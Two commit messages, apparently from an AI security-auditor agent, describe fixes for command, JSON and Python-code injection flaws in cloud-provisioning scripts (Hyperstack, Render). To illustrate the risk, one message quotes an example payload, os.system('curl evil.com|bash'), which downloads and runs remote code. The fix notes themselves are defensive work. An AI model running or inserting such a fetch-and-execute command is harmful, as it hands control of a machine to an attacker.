- Validate SPAWN_ISSUE is a positive integer in both trigger-server.ts
and refactor.sh to prevent command injection via crafted issue params
- Use Python json.dumps for Render _render_create_service JSON body
instead of string interpolation (prevents JSON injection)
- Remove erroneous "api_key" 6th argument in Hyperstack generic_cloud_api
call that was being interpreted as max_retries, breaking all API calls
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The create_vm function interpolated $environment (HYPERSTACK_ENVIRONMENT
env var or user prompt) and $image (HYPERSTACK_IMAGE env var) directly
into Python code using single-quote string literals. An attacker who
controls these env vars could break out of the string and execute
arbitrary Python code (e.g., os.system('curl evil.com|bash')).
Fix: Pass all values via stdin to Python instead of shell interpolation.
This eliminates the injection vector entirely, matching the pattern used
to fix similar issues in other providers (Scaleway, UpCloud, etc.).
Agent: security-auditor
Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
